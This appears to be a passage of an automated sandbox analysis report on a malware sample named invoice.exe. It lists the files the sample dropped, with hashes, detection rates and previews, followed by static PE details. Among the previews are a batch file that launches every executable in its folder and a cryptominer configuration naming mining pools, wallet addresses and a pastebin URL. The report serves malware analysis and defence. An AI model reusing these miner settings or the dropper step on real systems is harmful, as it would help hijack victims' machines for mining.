                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.2.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DC1.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4710
                                Entropy (8bit):4.469122256987712
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsJJg77aI9jgWpW8VYHfYm8M4JpHFA+q8vUmcXrhk5ydd:uIjfbI7VZ7VfJ4KforS5ydd
                                MD5:D03B860DA25A7AB8DE2FEBBE9A787A15
                                SHA1:21C7B5A3115294EB3FF588890FB26AE569F3D653
                                SHA-256:9BD3439E052FEDCEDF82D643B8F57F6E66BE2308339921568BBCD70D52BA25C0
                                SHA-512:A1A199D1219ECD0049164340A968E36C0DD30A5F3803C6A63003DA9D7240801D0E66594821D3C07CD4073F468DE754AFE09EB7638123F48B921EDD19046B04C3
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="486168" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6689.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Wed Sep 4 23:45:36 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):43506
                                Entropy (8bit):1.6752651557632254
                                Encrypted:false
                                SSDEEP:96:5u8DLt6f9XdScjnO7mVCmi7X9GVW4ywQJD/Rthcf3KRdGqb8yZf1aLWIkWIxlI5Q:HDw+QnOsOA8tE3KDGqbT6ynR6Q
                                MD5:55261C98F84AB9568B22C02C703EED4F
                                SHA1:BCCC9AEACC3C247C374C6B8698FAB0EA788B31D6
                                SHA-256:D091DDAD9AD80DDB85BB378B8666AE7D197B47F27876C7EEBA8082280BEB4034
                                SHA-512:69E43A7768C0185E552532BFE4570AB4209105D3FAD2A87E99E53C16AB1FBC8B160D70A545C6E79A4D0ECE80EA277843660E83ACB130772FCAFFD2BB16CC7307
                                Malicious:false
                                Preview:MDMP..a..... ....... ..f........................0...........4...v!..........T.......8...........T...........@...........................................................................................................eJ..............GenuineIntel............T.......p......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6774.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):6400
                                Entropy (8bit):3.7216467473264574
                                Encrypted:false
                                SSDEEP:96:RSIU6o7wVetbTll6wZeYkPlQE/ZJY5aM4U/89be9sfzKm:R6l7wVeJTll6wZeYCopr/89be9sfzKm
                                MD5:047825DDF8528B57B5CEF9B05E719D1C
                                SHA1:FEF195FBD341E664E9A31050F8EC8EE2B9515BCD
                                SHA-256:5C17AF709B537BB4EDD779F644FA6A83A71F2AE2422A56DBD28575AAA6576A3D
                                SHA-512:C364E5662755DE27BF18CF6D50EF2C9BF9AA975FA2041F1A79E2E1A4431E811518C33F61C117F4CDD8831875646D630BA825BC7295664FD8776376926F8E0912
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.4.4.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6794.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4730
                                Entropy (8bit):4.469740454253518
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsJJg77aI9jgWpW8VYzoYm8M4JaDLHFz3+q8vVLsjojGsGLd:uIjfbI7VZ7VkFJaDB3KV4GGsGLd
                                MD5:E2E74B8661EE4CF5F0A99C7F6814C605
                                SHA1:9D6B0A575AD23986E0F732FE152CDE2B05F25115
                                SHA-256:F6ADD475152B79219B1B6A194704DBAA54A2538250B195B9D8CBAB9BA8D2C368
                                SHA-512:DFC4FB387659CC99BF58B35BD795ECAAF1F7367FF13AF18EB263627DA85355BF8B73EAC7879D648D9CF5257372DE83AC7AC6F0159303FBE319CE202F270F7A5B
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="486168" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.3785452578096224
                                Encrypted:false
                                SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:fLHyIFKL3IZ2KRH9Ouggs
                                MD5:0B7FBAAF2958D626E9E18D8EA143F65E
                                SHA1:DA0CBF5CCDF1A6903F0B599C52149329C8BD0C4A
                                SHA-256:0C8F80A793D13EBDBC0BF9527F4DA1EB7C2CCE7C72902B2D88E4B28A6F76B5A0
                                SHA-512:3C0F7ADE5B1436382F41BCEE13ECB724B943CA67FC4A69432610B05BF0049641194131E26984C086BBCB678216A256897696110330E42AA3891208E7BB5EEA38
                                Malicious:false
                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe

                                Download File
                                Process:C:\Users\user\Desktop\invoice.exe
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3555328
                                Entropy (8bit):1.0341658078917435
                                Encrypted:false
                                SSDEEP:6144:CGoJoXgGI1e6sQayFAOaIicmsSsx1iT+QOQ86/zq:5oJoXgdYQn6cLr++QR8k
                                MD5:B154114F2D13496DC9630CAC4E707672
                                SHA1:ADE072FEA73E4F76C073E17BB75DC2D13B275919
                                SHA-256:72D79FB5CFD43477A78468976FA015486F13504F36315379CCD3EDE0E84B3DDB
                                SHA-512:DFD8FEF8EEA701B017B935B62F99F306A9BA9ADFD9A5FE0A5C18346B2E6CC432AF62DDA2638DED60C5D09B1B53FE8E75D1C5AAC4D9F6CAC6306A3A3CBBBFB8AF
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 83%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jo...............e......e.......e.....nt.....nt......e...........nt.._...jt......jt.....Rich............................PE..L.....dd............... .....Z.......v............@...........................6...........@.....................................<............................@..l...(...............................h...@...............X............................text............................... ..`.rdata..............................@..@.data...Xl.......^..................@....reloc..l....@......................@..B.aliz1...A...`...B...8................@P.aliz1...A.......B...z................@P.aliz1...A.......B....................@P.aliz1...A...P*..B....)...............@P................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat

                                Download File
                                Process:C:\Users\user\Desktop\invoice.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):85
                                Entropy (8bit):4.343204656270956
                                Encrypted:false
                                SSDEEP:3:mKDDQjZmRVVcFv0dAHlRgvYoU:hENmRVCFMdAt
                                MD5:A1099E439C142789FF2183C18F77CDCA
                                SHA1:F7EFCCA92B6138C091C926277D5C29DFEFE0872E
                                SHA-256:8FD34FEB39582F009552D460E8D24539DD00BB1251F2E721277FB3559C998917
                                SHA-512:7BC34150F5662589F6D16803716DEB7974C56E4665907BD7E2A4337C6E9397603B3A8D9E4F8F64C5BBB4C948C168843555FCC744F86EB932CDDB3D94AF6B7CDC
                                Malicious:false
                                Preview:@echo off..for /f "tokens=*" %%a in ('dir /b "*.exe"') do (.. start /b "" "%%a"..)

                                C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe

                                Download File
                                Process:C:\Users\user\Desktop\invoice.exe
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):6004224
                                Entropy (8bit):4.279748667922797
                                Encrypted:false
                                SSDEEP:24576:yL9LDCoI9KzJSHvh2Lwtp0E8bn/XDtYp0KGfvJPDovMXF7lOXrtQ4bFE:e9nCoI9KwpH8hLTXF7lOXp
                                MD5:D076D83093CF70D43AE8202CB9603D0D
                                SHA1:4DF9ED4524474C5108453453DCFE837AA148B761
                                SHA-256:F84056220C4D155CCD53C681575DF2C05185FDFDF17780A1F3722CC6F10F0C30
                                SHA-512:B7C38277D614DFE5C28DD61D7289C9B3D306E51811DF1237CCF8ECB851C9A20692F6FE9641F367B507B87340AD96C8617E95DD60E954BD6D63AA0E4780317310
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jo...............e......e.......e.....nt.....nt......e...........nt.._...jt......jt.....Rich............................PE..L...>.dd............... ......(......v............@...........................\...........@.....................................<.............................*.l...(...............................h...@...............X............................text............................... ..`.rdata..............................@..@.data.....'.......'.................@....reloc..l.....*......z*.............@..B.aliz1...A....*..B....*...............@P.aliz1...A....7..B....6...............@P.aliz1...A...`C..B....C...............@P.aliz1...A....O..B...\O...............@P................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bihor1c.sep.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3himyz5.oau.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mweknpym.tig.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svdgjqld.40r.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\logs.uce

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):345
                                Entropy (8bit):5.7081731137089875
                                Encrypted:false
                                SSDEEP:6:DiYgE/ovRhBFqGTUhKliYgE/ovRhBFqGTUhKSI7wKd/cwEJPDdVsYQnKfaHTPOxR:uwgphTlMxwgphTlMA7cwo7LS9jqgq2Ah
                                MD5:0A686F03494576F1204E65653BCE54BF
                                SHA1:22FAA860EC67A432ED3B6829939B5F6353139BC4
                                SHA-256:E93E709DA2BF600012DF6FA6BEE9775C42C337501C485757F3A7BCA17C135D7D
                                SHA-512:EEA7C9A97657EF872D777504C1A5981437493C940B745EFAAE8D521877862398EDFB4FFD49D79D434AF5D12F2433DA605EA2959858CC1858B40098C768E66253
                                Malicious:false
                                Preview:ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..XMR..xmr-eu1.nanopool.org:14433..4ABgk8FGE9UaEq9uhKpc9sMMfHouAgzvXeLJy8MmydhZMM8bWoTDuDWGj5bboFKWMzTcTfhaVhQ1zLbvrKUR9kjvA69WX8K..S1lent_Hash..S1lent_Hash..cp..https://pastebin.com/raw/PTNbBX9V..

                                C:\Windows\appcompat\Programs\Amcache.hve

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.468278001140912
                                Encrypted:false
                                SSDEEP:6144:+IXfpi67eLPU9skLmb0b4PWSPKaJG8nAgejZMMhA2gX4WABl0uN5dwBCswSbz:TXD94PWlLZMM6YFHf+z
                                MD5:D415CE45F75CB9E378956B0F671E89FB
                                SHA1:3B2404AACEF576F361EC751743EE6949108EAAA6
                                SHA-256:7B68528B2EBFAA8D0254A729C0A3489AD16E211F448ADEB18D9A774F9B02D970
                                SHA-512:21B488D2C6BDA78A91716A8F7226AB7B1A11BE7CEA01AFF20D9FF4FFB3180E2ED5A9872336011F2EACD5609C5C61CD788FB79192543153452AE85578A98F6E9E
                                Malicious:false
                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..W.$...............................................................................................................................................................................................................................................................................................................................................dl@.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\logs.uce

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):345
                                Entropy (8bit):5.7081731137089875
                                Encrypted:false
                                SSDEEP:6:DiYgE/ovRhBFqGTUhKliYgE/ovRhBFqGTUhKSI7wKd/cwEJPDdVsYQnKfaHTPOxR:uwgphTlMxwgphTlMA7cwo7LS9jqgq2Ah
                                MD5:0A686F03494576F1204E65653BCE54BF
                                SHA1:22FAA860EC67A432ED3B6829939B5F6353139BC4
                                SHA-256:E93E709DA2BF600012DF6FA6BEE9775C42C337501C485757F3A7BCA17C135D7D
                                SHA-512:EEA7C9A97657EF872D777504C1A5981437493C940B745EFAAE8D521877862398EDFB4FFD49D79D434AF5D12F2433DA605EA2959858CC1858B40098C768E66253
                                Malicious:false
                                Preview:ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..XMR..xmr-eu1.nanopool.org:14433..4ABgk8FGE9UaEq9uhKpc9sMMfHouAgzvXeLJy8MmydhZMM8bWoTDuDWGj5bboFKWMzTcTfhaVhQ1zLbvrKUR9kjvA69WX8K..S1lent_Hash..S1lent_Hash..cp..https://pastebin.com/raw/PTNbBX9V..

                                \Device\ConDrv

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.1709505944546685
                                Encrypted:false
                                SSDEEP:3:BXxX2Xn:hxg
                                MD5:5BFA42CC537113132361E5365E83890F
                                SHA1:061959C59F11674A488E276B1024E9ED4F9C60B4
                                SHA-256:5C4D51FD2BF2841C3B7396C88957FC96FC05283FB15F78D92693FB7EE901B430
                                SHA-512:726A7D4940EAEEE129B1DCDD1234007CA3CF2B1A3E5CFE233D9FF8D7E9B2E02A9B764C355C5EB4DAB654036CA1F9EEF067AFFAC4BDBA3AD48628368FE4D398B3
                                Malicious:false
                                Preview:5124532452

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.845513575891335
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:invoice.exe
                                File size:1'262'619 bytes
                                MD5:6af6a7fac1197a9b12b28c0e4db8c18a
                                SHA1:357ae7d706de393d8743dbbe0d94bc87922643cf
                                SHA256:d0a2035c0431796c138a26d1c9a75142b613c5417dc96a9200723870d0b3a687
                                SHA512:6a89fbff98be91a89008830f7aa3f88ef8fcd4c9967d1443abda4bad71097f6abc6a1371e0767e8853a3e52bd4e3f944f4ccbb7f8173d06d7c777bc71823f899
                                SSDEEP:24576:2TbBv5rUyXVTW6Hq69NuPQPyUfezTtJiC7nVUriVGAQ+hw17tq:IBJTzHqBQrW3tEwnGtdCOBq
                                TLSH:E7451241BAC1D4B2D5630C326B695B21A83C7D202F25CEEF53D06E5EDA316D0EB35B62
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                File Icon

                                Icon Hash:1515d4d4442f2d2d

                                Static PE Info

                                General

                                Entrypoint:0x41f530
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                Entrypoint Preview

                                Instruction
                                call 00007F66BCD064CBh
                                jmp 00007F66BCD05DDDh
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push esi
                                push dword ptr [ebp+08h]
                                mov esi, ecx
                                call 00007F66BCCF8C27h
                                mov dword ptr [esi], 004356D0h
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                and dword ptr [ecx+04h], 00000000h
                                mov eax, ecx
                                and dword ptr [ecx+08h], 00000000h
                                mov dword ptr [ecx+04h], 004356D8h
                                mov dword ptr [ecx], 004356D0h
                                ret
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push esi
                                mov esi, ecx
                                lea eax, dword ptr [esi+04h]
                                mov dword ptr [esi], 004356B8h
                                push eax
                                call 00007F66BCD0926Fh
                                test byte ptr [ebp+08h], 00000001h
                                pop ecx
                                je 00007F66BCD05F6Ch
                                push 0000000Ch
                                push esi
                                call 00007F66BCD05529h
                                pop ecx
                                pop ecx
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                push ebp
                                mov ebp, esp
                                sub esp, 0Ch
                                lea ecx, dword ptr [ebp-0Ch]
                                call 00007F66BCCF8BA2h
                                push 0043BEF0h
                                lea eax, dword ptr [ebp-0Ch]
                                push eax
                                call 00007F66BCD08D29h
                                int3
                                push ebp
                                mov ebp, esp
                                sub esp, 0Ch
                                lea ecx, dword ptr [ebp-0Ch]
                                call 00007F66BCD05EE8h
                                push 0043C0F4h
                                lea eax, dword ptr [ebp-0Ch]
                                push eax
                                call 00007F66BCD08D0Ch
                                int3
                                jmp 00007F66BCD0A7A7h
                                int3
                                int3
                                int3
                                int3
                                push 00422900h
                                push dword ptr fs:[00000000h]

                                Rich Headers

                                Programming Language:
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
